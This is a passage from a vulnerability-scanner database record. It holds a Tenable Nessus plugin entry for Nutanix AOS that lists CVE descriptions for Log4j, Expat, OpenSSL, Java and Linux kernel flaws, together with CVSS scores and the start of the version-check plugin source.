2.4.3 has an integer overflow.\n (CVE-2022-22826)\n\n - storeAtts in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow. (CVE-2022-22827)\n\n - Expat (aka libexpat) before 2.4.4 has a signed integer overflow in XML_GetBuffer, for configurations with a nonzero XML_CONTEXT_BYTES. (CVE-2022-23852)\n\n - xmltok_impl.c in Expat (aka libexpat) before 2.4.5 lacks certain validation of encoding, such as checks for whether a UTF-8 character is valid in a certain context. (CVE-2022-25235)\n\n - xmlparse.c in Expat (aka libexpat) before 2.4.5 allows attackers to insert namespace-separator characters into namespace URIs. (CVE-2022-25236)\n\n - In Expat (aka libexpat) before 2.4.5, there is an integer overflow in storeRawNames. (CVE-2022-25315)\n\n - ** DISPUTED ** An issue was discovered in the Bidirectional Algorithm in the Unicode Specification through 14.0. It permits the visual reordering of characters via control sequences, which can be used to craft source code that renders different logic than the logical ordering of tokens ingested by compilers and interpreters. Adversaries can leverage this to encode source code for compilers accepting Unicode such that targeted vulnerabilities are introduced invisibly to human reviewers. NOTE: the Unicode Consortium offers the following alternative approach to presenting this concern. An issue is noted in the nature of international text that can affect applications that implement support for The Unicode Standard and the Unicode Bidirectional Algorithm (all versions). Due to text display behavior when text includes left-to- right and right-to-left characters, the visual order of tokens may be different from their logical order.\n Additionally, control characters needed to fully support the requirements of bidirectional text can further obfuscate the logical order of tokens. Unless mitigated, an adversary could craft source code such that the ordering of tokens perceived by human reviewers does not match what will be processed by a compiler/interpreter/etc. The Unicode Consortium has documented this class of vulnerability in its document, Unicode Technical Report #36, Unicode Security Considerations. The Unicode Consortium also provides guidance on mitigations for this class of issues in Unicode Technical Standard #39, Unicode Security Mechanisms, and in Unicode Standard Annex #31, Unicode Identifier and Pattern Syntax. Also, the BIDI specification allows applications to tailor the implementation in ways that can mitigate misleading visual reordering in program text; see HL4 in Unicode Standard Annex #9, Unicode Bidirectional Algorithm.\n (CVE-2021-42574)\n\n - sshd in OpenSSH 6.2 through 8.x before 8.8, when certain non-default configurations are used, allows privilege escalation because supplemental groups are not initialized as expected. Helper programs for AuthorizedKeysCommand and AuthorizedPrincipalsCommand may run with privileges associated with group memberships of the sshd process, if the configuration specifies running the command as a different user.\n (CVE-2021-41617)\n\n - Included in Log4j 1.2 is a SocketServer class that is vulnerable to deserialization of untrusted data which can be exploited to remotely execute arbitrary code when combined with a deserialization gadget when listening to untrusted network traffic for log data. This affects Log4j versions up to 1.2 up to 1.2.17.\n (CVE-2019-17571)\n\n - Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender. Fixed in Apache Log4j 2.12.3 and 2.13.1 (CVE-2020-9488)\n\n - JMSSink in all versions of Log4j 1.x is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration or if the configuration references an LDAP service the attacker has access to. The attacker can provide a TopicConnectionFactoryBindingName configuration causing JMSSink to perform JNDI requests that result in remote code execution in a similar fashion to CVE-2021-4104. Note this issue only affects Log4j 1.x when specifically configured to use JMSSink, which is not the default. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2022-23302)\n\n - By design, the JDBCAppender in Log4j 1.2.x accepts an SQL statement as a configuration parameter where the values to be inserted are converters from PatternLayout. The message converter, %m, is likely to always be included. This allows attackers to manipulate the SQL by entering crafted strings into input fields or headers of an application that are logged allowing unintended SQL queries to be executed. Note this issue only affects Log4j 1.x when specifically configured to use the JDBCAppender, which is not the default.\n Beginning in version 2.0-beta8, the JDBCAppender was re-introduced with proper support for parameterized SQL queries and further customization over the columns written to in logs. Apache Log4j 1.2 reached end of life in August 2015. Users should upgrade to Log4j 2 as it addresses numerous other issues from the previous versions. (CVE-2022-23305)\n\n - CVE-2020-9493 identified a deserialization issue that was present in Apache Chainsaw. Prior to Chainsaw V2.0 Chainsaw was a component of Apache Log4j 1.2.x where the same issue exists. (CVE-2022-23307)\n\n - A flaw memory leak in the Linux kernel performance monitoring subsystem was found in the way if using PERF_EVENT_IOC_SET_FILTER. A local user could use this flaw to starve the resources causing denial of service. (CVE-2020-25704)\n\n - An issue was discovered in the FUSE filesystem implementation in the Linux kernel before 5.10.6, aka CID-5d069dbe8aaf. fuse_do_getattr() calls make_bad_inode() in inappropriate situations, causing a system crash. NOTE: the original fix for this vulnerability was incomplete, and its incompleteness is tracked as CVE-2021-28950. (CVE-2020-36322)\n\n - A heap-based buffer overflow flaw was found in the Linux kernel FireDTV media card driver, where the user calls the CA_SEND_MSG ioctl. This flaw allows a local user of the host machine to crash the system or escalate privileges on the system. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. (CVE-2021-42739)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions. (CVE-2020-11651)\n\n - An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users. (CVE-2020-11652)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-09-01T00:00:00", "type": "nessus", "title": "Nutanix AOS : Multiple Vulnerabilities (NXSA-AOS-6.1.1)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4658", "CVE-2019-17571", "CVE-2020-0465", "CVE-2020-0466", "CVE-2020-11651", "CVE-2020-11652", "CVE-2020-25704", "CVE-2020-25709", "CVE-2020-25710", "CVE-2020-36322", "CVE-2020-36385", "CVE-2020-9484", "CVE-2020-9488", "CVE-2020-9493", "CVE-2021-0920", "CVE-2021-20271", "CVE-2021-21996", "CVE-2021-22543", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-26691", "CVE-2021-28950", "CVE-2021-30640", "CVE-2021-34798", "CVE-2021-35550", "CVE-2021-35556", "CVE-2021-35559", "CVE-2021-35561", "CVE-2021-35564", "CVE-2021-35565", "CVE-2021-35567", "CVE-2021-35578", "CVE-2021-35586", "CVE-2021-35588", "CVE-2021-35603", "CVE-2021-3564", "CVE-2021-3573", "CVE-2021-3653", "CVE-2021-3656", "CVE-2021-3752", "CVE-2021-37576", "CVE-2021-39275", "CVE-2021-4034", "CVE-2021-40438", "CVE-2021-4104", "CVE-2021-4155", "CVE-2021-41617", "CVE-2021-42340", "CVE-2021-42574", "CVE-2021-42739", "CVE-2021-43527", "CVE-2021-44228", "CVE-2021-44790", "CVE-2021-44832", "CVE-2021-45046", "CVE-2021-45105", "CVE-2021-45417", "CVE-2021-45960", "CVE-2021-46143", "CVE-2022-0330", "CVE-2022-0778", "CVE-2022-21248", "CVE-2022-21277", "CVE-2022-21282", "CVE-2022-21283", "CVE-2022-21291", "CVE-2022-21293", "CVE-2022-21294", "CVE-2022-21296", "CVE-2022-21299", "CVE-2022-21305", "CVE-2022-21340", "CVE-2022-21341", "CVE-2022-21349", "CVE-2022-21360", "CVE-2022-21365", "CVE-2022-21366", "CVE-2022-22720", "CVE-2022-22822", "CVE-2022-22823", "CVE-2022-22824", "CVE-2022-22825", "CVE-2022-22826", "CVE-2022-22827", "CVE-2022-22942", "CVE-2022-23181", "CVE-2022-23302", "CVE-2022-23305", "CVE-2022-23307", "CVE-2022-23852", "CVE-2022-24407", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-25315"], "modified": "2023-01-12T00:00:00", "cpe": ["cpe:/o:nutanix:aos"], "id": "NUTANIX_NXSA-AOS-6_1_1.NASL", "href": "https://www.tenable.com/plugins/nessus/164572", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(164572);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\n \"CVE-2016-4658\",\n \"CVE-2019-17571\",\n \"CVE-2020-0465\",\n \"CVE-2020-0466\",\n \"CVE-2020-9484\",\n \"CVE-2020-9488\",\n \"CVE-2020-11651\",\n \"CVE-2020-11652\",\n \"CVE-2020-25704\",\n \"CVE-2020-25709\",\n \"CVE-2020-25710\",\n \"CVE-2020-36322\",\n \"CVE-2020-36385\",\n \"CVE-2021-0920\",\n \"CVE-2021-3564\",\n \"CVE-2021-3573\",\n \"CVE-2021-3653\",\n \"CVE-2021-3656\",\n \"CVE-2021-3752\",\n \"CVE-2021-4034\",\n \"CVE-2021-4104\",\n \"CVE-2021-4155\",\n \"CVE-2021-20271\",\n \"CVE-2021-21996\",\n \"CVE-2021-22543\",\n \"CVE-2021-23840\",\n \"CVE-2021-23841\",\n \"CVE-2021-26691\",\n \"CVE-2021-30640\",\n \"CVE-2021-34798\",\n \"CVE-2021-35550\",\n \"CVE-2021-35556\",\n \"CVE-2021-35559\",\n \"CVE-2021-35561\",\n \"CVE-2021-35564\",\n \"CVE-2021-35565\",\n \"CVE-2021-35567\",\n \"CVE-2021-35578\",\n \"CVE-2021-35586\",\n \"CVE-2021-35588\",\n \"CVE-2021-35603\",\n \"CVE-2021-37576\",\n \"CVE-2021-39275\",\n \"CVE-2021-40438\",\n \"CVE-2021-41617\",\n \"CVE-2021-42340\",\n \"CVE-2021-42574\",\n \"CVE-2021-42739\",\n \"CVE-2021-43527\",\n \"CVE-2021-44228\",\n \"CVE-2021-44790\",\n \"CVE-2021-44832\",\n \"CVE-2021-45046\",\n \"CVE-2021-45105\",\n \"CVE-2021-45417\",\n \"CVE-2021-45960\",\n \"CVE-2021-46143\",\n \"CVE-2022-0330\",\n \"CVE-2022-0778\",\n \"CVE-2022-21248\",\n \"CVE-2022-21277\",\n \"CVE-2022-21282\",\n \"CVE-2022-21283\",\n \"CVE-2022-21291\",\n \"CVE-2022-21293\",\n \"CVE-2022-21294\",\n \"CVE-2022-21296\",\n \"CVE-2022-21299\",\n \"CVE-2022-21305\",\n \"CVE-2022-21340\",\n \"CVE-2022-21341\",\n \"CVE-2022-21349\",\n \"CVE-2022-21360\",\n \"CVE-2022-21365\",\n \"CVE-2022-21366\",\n \"CVE-2022-22720\",\n \"CVE-2022-22822\",\n \"CVE-2022-22823\",\n \"CVE-2022-22824\",\n \"CVE-2022-22825\",\n \"CVE-2022-22826\",\n \"CVE-2022-22827\",\n \"CVE-2022-22942\",\n \"CVE-2022-23181\",\n \"CVE-2022-23302\",\n \"CVE-2022-23305\",\n \"CVE-2022-23307\",\n \"CVE-2022-23852\",\n \"CVE-2022-24407\",\n \"CVE-2022-25235\",\n \"CVE-2022-25236\",\n \"CVE-2022-25315\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/15\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/24\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/18\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0052\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0041\");\n\n script_name(english:\"Nutanix AOS : Multiple Vulnerabilities (NXSA-AOS-6.1.1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Nutanix AOS host is affected by multiple vulnerabilities .\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of AOS installed on the remote host is prior to 6.1.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the NXSA-AOS-6.1.1 advisory.\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: Serialization). Supported versions that are affected are Oracle Java SE: 7u321, 8u311,\n 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Difficult to exploit vulnerability\n allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE,\n Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized\n update, insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible\n data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java\n Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes\n from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by\n using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS\n 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N).\n (CVE-2022-21248)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: ImageIO). Supported versions that are affected are Oracle Java SE: 11.0.13, 17.01; Oracle\n GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated\n attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM\n Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a\n partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This\n vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start\n applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the\n internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using\n APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1\n Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21277, CVE-2022-21366)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01;\n Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle\n GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized read\n access to a subset of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data. Note: This\n vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start\n applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the\n internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using\n APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1\n Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).\n (CVE-2022-21282, CVE-2022-21296)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: Libraries). Supported versions that are affected are Oracle Java SE: 11.0.13, 17.01; Oracle\n GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated\n attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM\n Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a\n partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This\n vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start\n applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the\n internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using\n APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1\n Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21283)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: Hotspot). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13,\n 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle\n GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized update,\n insert or delete access to some of Oracle Java SE, Oracle GraalVM Enterprise Edition accessible data.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web\n Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from\n the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using\n APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1\n Base Score 5.3 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N).\n (CVE-2022-21291, CVE-2022-21305)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: Libraries). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13,\n 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle\n GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web\n Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from\n the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using\n APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1\n Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21293, CVE-2022-21294, CVE-2022-21340)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: JAXP). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13, 17.01;\n Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle\n GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web\n Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from\n the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using\n APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1\n Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21299)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: Serialization). Supported versions that are affected are Oracle Java SE: 7u321, 8u311,\n 11.0.13, 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability\n allows unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE,\n Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized\n ability to cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise\n Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java\n Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes\n from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by\n using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS\n 3.1 Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21341)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: 2D). Supported versions that are affected are Oracle Java SE: 7u321, 8u311; Oracle GraalVM\n Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows unauthenticated attacker\n with network access via multiple protocols to compromise Oracle Java SE, Oracle GraalVM Enterprise\n Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial\n denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This\n vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start\n applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the\n internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using\n APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1\n Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21349)\n\n - Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE\n (component: ImageIO). Supported versions that are affected are Oracle Java SE: 7u321, 8u311, 11.0.13,\n 17.01; Oracle GraalVM Enterprise Edition: 20.3.4 and 21.3.0. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via multiple protocols to compromise Oracle Java SE, Oracle\n GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to\n cause a partial denial of service (partial DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition.\n Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web\n Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from\n the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using\n APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1\n Base Score 5.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L).\n (CVE-2022-21360, CVE-2022-21365)\n\n - NSS (Network Security Services) versions prior to 3.73 or 3.68.1 ESR are vulnerable to a heap overflow\n when handling DER-encoded DSA or RSA-PSS signatures. Applications using NSS for handling signatures\n encoded within CMS, S/MIME, PKCS \\#7, or PKCS \\#12 are likely to be impacted. Applications using NSS for\n certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how\n they configure NSS. *Note: This vulnerability does NOT impact Mozilla Firefox.* However, email clients and\n PDF viewers that use NSS for signature verification, such as Thunderbird, LibreOffice, Evolution and\n Evince are believed to be impacted. This vulnerability affects NSS < 3.73 and NSS < 3.68.1.\n (CVE-2021-43527)\n\n - xpointer.c in libxml2 before 2.9.5 (as used in Apple iOS before 10, OS X before 10.12, tvOS before 10, and\n watchOS before 3, and other products) does not forbid namespace nodes in XPointer ranges, which allows\n remote attackers to execute arbitrary code or cause a denial of service (use-after-free and memory\n corruption) via a crafted XML document. (CVE-2016-4658)\n\n - AIDE before 0.17.4 allows local users to obtain root privileges via crafted file metadata (such as XFS\n extended attributes or tmpfs ACLs), because of a heap-based buffer overflow. (CVE-2021-45417)\n\n - Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are\n vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI\n LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by\n limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.\n (CVE-2021-44832)\n\n - An issue was discovered in Linux: KVM through Improper handling of VM_IO|VM_PFNMAP vmas in KVM can bypass\n RO checks and can lead to pages being freed while still accessible by the VMM and guest. This allows users\n with the ability to start and control a VM to read/write random pages of memory and can result in local\n privilege escalation. (CVE-2021-22543)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when\n processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested\n guest (L2). Due to improper validation of the int_ctl field, this issue could allow a malicious L1 to\n enable AVIC support (Advanced Virtual Interrupt Controller) for the L2 guest. As a result, the L2 guest\n would be allowed to read/write physical pages of the host, resulting in a crash of the entire system, leak\n of sensitive data or potential guest-to-host escape. This flaw affects Linux kernel versions prior to\n 5.14-rc7. (CVE-2021-3653)\n\n - A flaw was found in the KVM's AMD code for supporting SVM nested virtualization. The flaw occurs when\n processing the VMCB (virtual machine control block) provided by the L1 guest to spawn/handle a nested\n guest (L2). Due to improper validation of the virt_ext field, this issue could allow a malicious L1 to\n disable both VMLOAD/VMSAVE intercepts and VLS (Virtual VMLOAD/VMSAVE) for the L2 guest. As a result, the\n L2 guest would be allowed to read/write physical pages of the host, resulting in a crash of the entire\n system, leak of sensitive data or potential guest-to-host escape. (CVE-2021-3656)\n\n - arch/powerpc/kvm/book3s_rtas.c in the Linux kernel through 5.13.5 on the powerpc platform allows KVM guest\n OS users to cause host OS memory corruption via rtas_args.nargs, aka CID-f62f3c20647e. (CVE-2021-37576)\n\n - Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI\n features used in configuration, log messages, and parameters do not protect against attacker controlled\n LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters\n can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From\n log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3,\n and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to\n log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.\n (CVE-2021-44228)\n\n - It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-\n default configurations. This could allows attackers with control over Thread Context Map (MDC) input data\n when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for\n example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input\n data using a JNDI Lookup pattern resulting in an information leak and remote code execution in some\n environments and local code execution in all environments. Log4j 2.16.0 (Java 8) and 2.12.2 (Java 7) fix\n this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n (CVE-2021-45046)\n\n - A crafted request uri-path can cause mod_proxy to forward the request to an origin server choosen by the\n remote user. This issue affects Apache HTTP Server 2.4.48 and earlier. (CVE-2021-40438)\n\n - Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument\n in some cases where the input length is close to the maximum permissable length for an integer on the\n platform. In such cases the return value from the function call will be 1 (indicating success), but the\n output length value will be negative. This could cause applications to behave incorrectly or crash.\n OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to\n OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out\n of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should\n upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i).\n Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x). (CVE-2021-23840)\n\n - The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based\n on the issuer and serial number data contained within an X509 certificate. However it fails to correctly\n handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is\n maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a\n potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by\n OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on\n certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are\n affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x\n and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving\n public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should\n upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected\n 1.0.2-1.0.2x). (CVE-2021-23841)\n\n - A vulnerability in the JNDI Realm of Apache Tomcat allows an attacker to authenticate using variations of\n a valid user name and/or to bypass some of the protection provided by the LockOut Realm. This issue\n affects Apache Tomcat 10.0.0-M1 to 10.0.5; 9.0.0.M1 to 9.0.45; 8.5.0 to 8.5.65. (CVE-2021-30640)\n\n - Vulnerability in the Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component:\n JSSE). Supported versions that are affected are Java SE: 7u311, 8u301, 11.0.12; Oracle GraalVM Enterprise\n Edition: 20.3.3 and 21.2.0. Difficult to exploit vulnerability allows unauthenticated attacker with\n network access via TLS to compromise Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of\n this vulnerability can result in unauthorized access to critical data or complete access to all Java SE,\n Oracle GraalVM Enterprise Edition accessible data. Note: This vulnerability applies to Java deployments,\n typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load\n and run untrusted code (e.g., code that comes from the internet) and rely on the Java 